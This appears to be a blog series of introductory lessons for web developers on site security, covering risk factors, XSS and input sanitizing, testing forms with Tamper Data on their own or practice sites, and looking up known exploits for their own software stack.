Security for Web Developers: 09: Exploits

Security Exploits

Which Exploits Will You Meet: Known or Unknown?

Your site is likely to be attacked by known, old exploits, unless you’re a spy site. Don’t be relieved. You still have to protect your site against all those old threats, and the probabilities are way too great that something evil’s going to work.

Fortunately, truly rigorous auditing can keep you certain that your site is protected against the known threats.

Assignment: Look up your web application’s exploits at the Exploit Database
https://www.exploit-db.com/

Search against:

  • Your web server’s OS and version (Linux, Unix, Windows, Mac, e.g. Ubuntu Linux 14.04, Windows Server 2012, etc.)
  • Your web daemon software and version (Apache, IIS, Nginx, by version)
  • Your web language, framework, platform and version (PHP, Python, Java; CodeIgniter or J2EE; WordPress, Joomla! or Moodle, again by version)

Next: http://schoolforhackers.com/defense-strategies

Security for Web Developers: 08: What Can Hurt You

Script Kiddies

What You Know Can Hurt You. What You Don’t Know Can Hurt You.

Most so-called hackers are really just script kiddies:
http://www.hackpconline.com/2010/05/painfully-computer-pranks.html.

Most of the fruit is low-hanging:
https://www.toptal.com/security/10-most-common-web-security-vulnerabilities.

Real exploit developers who find real vulns go much deeper:
http://blog.dewhurstsecurity.com/2013/04/17/http-form-password-brute-forcing-the-need-for-speed.html.

Public and private groups share information (unfortunately, not to an equal degree) about newly discovered exploits: “zero day” exploits.

The most wicked exploits are saved for the highest-value targets and demonstrate vast knowledge and skill, for example Stuxnet:
http://arstechnica.com/tech-policy/2012/06/confirmed-us-israel-created-stuxnet-lost-control-of-it/.

Part of your equation is realistically considering the value – or controversy – of your website goodies.

Next: http://schoolforhackers.com/security-web-developers-exploits/

Security for Web Developers: 07: Tamper Data

Security Testing With Tamper Data

Tamper Data

Here’s a more sophisticated tutorial:

Assignment: Test your site security

Install Tamper Data in Firefox on a suitable computer. Now visit your site and find what you can tamper with. Particularly tinker with pages with forms, especially if you use hidden fields.

You can also try it out on Hack This Site (https://www.hackthissite.org/pages/index/index.php), or on your own testing sites like DVWA (http://www.dvwa.co.uk/) or Mutillidae (https://sourceforge.net/projects/mutillidae/).

Here’s how the really sophisticated bad guys do it:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.

Next: http://schoolforhackers.com/security-web-developers-can-hurt/

Security for Web Developers: 06: Security on Your Site

Site Security

Users run code (hopefully your code) when they:

  • Load any “active” page (.php, .py, .asp etc.)
  • Fill out forms
  • Search
  • Buy something
  • Create an account
  • Log in to an account

If you wrote the code, you know all too well that you’re letting visitors run it. If the site uses a database, users are touching it, directly or indirectly. What goes into the database is entirely your responsibility. Consider cross-site scripting, for instance: do you know how to prevent or detect it?

Tamper Data is a simple tool for (you guessed it) tampering with the data your browser sends to a web server (and vice-versa). Here’s an outdated example for the sake of simplicity:

This exploit won’t work in most places any more, but it’s a good illustration of how and why people will tamper with your site.

Next: http://schoolforhackers.com/security-web-developers-07-tamper-data/

Security for Web Developers: 05: Security on the Server Side

Server Security

Your server, your database and your site’s security

  • Do you host your own site, or is it hosted?
  • How many sites are hosted on the same server as yours?
  • What programming languages and platforms does it support?
  • How many open ports and opportunities for interaction does it offer?

A lot depends on properly sanitizing input that comes from the client to your server and database. Different languages have different techniques (like Perl’s “taint” system), but if you fail to use them your site can be vulnerable to Cross-Site Scripting (XSS).

Assignment: XSS Me

Watch this video, install this Firefox Add-on and unleash it on your own site or your test sites:

Next: http://schoolforhackers.com/security-web-developers-security-site/

Security for Web Developers: 04: Risk Factors

Internet Security Threats

Your site will be tested if:

  • It holds anything of value,
  • It attracts lots of attention (sorry) or
  • It’s controversial in any way.

The software you’ve written (your own code) critically depends on your knowledge of things like “sanitizing” the data input by users. See https://code.tutsplus.com/tutorials/sanitize-and-validate-data-with-php-filters–net-2595.

The platform you’ve built on, whether high-level like WordPress or much lower-level like CodeIgniter, will have its own security issues and require monitoring and patching.

And the same interactivity that attracts users and builds your following dramatically increases your risk.

The risk isn’t just yours: your users are taking a risk trusting you with any information, and simply by coming to your site. Injected code, for instance, can both steal data and infect visitors’ computers.

Next: http://schoolforhackers.com/security-web-developers-security-server-side/

Security for Web Developers: 03: What Makes Your Website Insecure?

Web security network

Your relative security is:

  • Lower if your site uses WordPress,
  • Lower if your site involves any controversial topic,
  • Lower if you store credit card or identity information,
  • Lower if your site has a login form,
  • Lower if your servers, applications and code are old or highly complex and
  • Lower if they are run by underfunded or outsourced IT.

Next: http://schoolforhackers.com/security-web-developers-risk-factors/